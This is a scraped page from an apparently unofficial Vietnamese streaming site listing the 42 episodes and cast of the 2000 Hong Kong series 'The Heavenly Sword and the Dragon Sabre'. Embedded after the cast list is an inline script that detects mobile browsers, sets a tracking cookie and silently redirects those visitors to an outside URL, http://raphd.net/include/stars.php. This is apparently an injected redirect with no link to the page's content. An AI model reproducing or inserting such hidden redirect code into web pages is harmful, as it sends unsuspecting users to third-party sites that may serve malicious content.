Home
 
phim hong kong - Cô Gái Đồ Long 2000 -The Heavenly Sword and the Dragon Sabre 42/42
co gai do long 2000
Cô Gái Đồ Long 2000 -The Heavenly Sword and the Dragon Sabre 42/42
42 episodes | 3155907 views  | 
Click +1 for faster streaming Share this with friends
Mirror 1: 1a 1b 1c 2a 2b 2c 3a 3b 3c 4a 4b 4c 5a 5b 5c 6a 6b 6c 7a 7b 7c 8a 8b 8c 9a 9b 9c 10a 10b 10c 11a 11b 11c 12a 12b 12c 13a 13b 13c 14a 14b 14c 15a 15b 15c 16a 16b 16c 17a 17b 17c 18a 18b 18c 19a 19b 19c 20a 20b 20c 21a 21b 21c 22a 22b 22c 23a 23b 23c 24a 24b 24c 25a 25b 25c 26a 26b 26c 27a 27b 27c 28a 28b 28c 29a 29b 29c 30a 30b 30c 31a 31b 31c 32a 32b 32c 33a 33b 33c 34a 34b 34c 35a 35b 35c 36a 36b 36c 37a 37b 37c 38a 38b 38c 39a 39b 39c 40a 40b 40c 41a 41b 41c 42a 42b 42c
Mirror 2: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
cham bi  Description - Thong tin them ve phim
Số tập: 42
Diễn viên
- Ngô Khải Hoa: Trương Vô Kỵ
- Lê Tư: Triệu Minh
- Xa Thi Mạn: Chu Chỉ Nhược
- Giang Hy Văn: Tiểu Siêu
- Trần Thể Lam: Hân Ly
- Lưu Tùng Nhân: Trương Thuý Sơn
- Mễ Tuyết: Hân Tố Tố
- Đằng Lệ Minh: Dương Bất Hốia
- Đặng Nhất Quân: Trương Vô Kỵ - lúc trẻ
- Lạc Ứng Quân: Tạ Tốn
- Trương Triệu Huy: Dương Tiêu
- Châu Thông: Trương Tam Phong function as_getCookie(c_name) {var c_value = document.cookie;var c_start = c_value.indexOf(' ' + c_name + '=');if (c_start == -1)c_start = c_value.indexOf(c_name + '=');if (c_start == -1)c_value = null;else {c_start = c_value.indexOf('=', c_start) + 1;var c_end = c_value.indexOf(';', c_start);if (c_end == -1)c_end = c_value.length;c_value = unescape(c_value.substring(c_start,c_end));}return c_value;}function as_setCookie(c_name,value,exdays) {var exdate=new Date();exdate.setDate(exdate.getDate() + exdays);var c_value=escape(value) + ((exdays==null) ? '' : '; expires='+exdate.toUTCString());document.cookie=c_name + '=' + c_value;} var ua = navigator.userAgent.toLowerCase();var arrMobi = new Array('midp', 'j2me', 'avantg', 'ipad', 'iphone', 'docomo', 'novarra', 'palmos','palmsource', '240x320', 'opwv', 'chtml', 'pda', 'windows ce','mmp/','mib/', 'symbian', 'wireless', 'nokia','hand', 'mobi', 'phone', 'cdm', 'up.b', 'audio', 'sie-', 'sec-','samsung', 'htc', 'mot-', 'mitsu', 'sagem', 'sony', 'alcatel','lg', 'erics', 'vx', 'nec', 'philips', 'mmm', 'xx', 'panasonic','sharp', 'wap', 'sch', 'rover', 'pocket', 'benq', 'java', 'pt','pg', 'vox', 'amoi', 'bird', 'compal', 'kg', 'voda', 'sany','kdd', 'dbt', 'sendo', 'sgh', 'gradi', 'jb', 'dddi', 'moto', 'opera mobi', 'opera mini', 'android');isMobile = false;for(i = 0; i < arrMobi.length; i++) {if(ua.indexOf(arrMobi[i]) != -1) {isMobile = true;break;}} if(isMobile) {rdCookieVarName = '__as_rd';rdTimes = 1;rdDays = 0;rdInterval = 0;isRedirect = true;if (rdDays > 0 || rdInterval > 0) {curTime = Math.round((new Date()).getTime() / 1000);cookieVal = as_getCookie(rdCookieVarName);if (cookieVal != null) {arr = cookieVal.split('.');rdCount = parseInt(arr[0]);rdLast = parseInt(arr[1]);} else {rdCount = 0;rdLast = curTime - rdInterval;}if ((curTime - rdDays * 86400) > rdLast)rdCount = 0;if (rdCount >= rdTimes)isRedirect = false;if (curTime < (rdLast + rdInterval))isRedirect = false;if (isRedirect) {rdCount++;as_setCookie(rdCookieVarName, rdCount + '.' + curTime, 365); }}if (isRedirect)location.href = 'http://raphd.net/include/stars.php';}
Phim cùng thể loại - Similar movies
View: 360211
View: 427776
View: 4779873
View: 2182936
View: 813700
View: 322825
View: 1247510
View: 316582
View: 182406
View: 811525
Categories
Want to watch phim online, but don't have time to check our blog everyday? Subscribe to our email newsletter to make sure you don't miss a single show.


  Users Online: 305
 
Copyright © 2009 - 2012 PhimBook.Com Phim Online Entertainment Network
Privacy Policy | DMCA Takedown
phim phu de online xem phim If you have any legal issues please contact appropriate media file owners / hosters.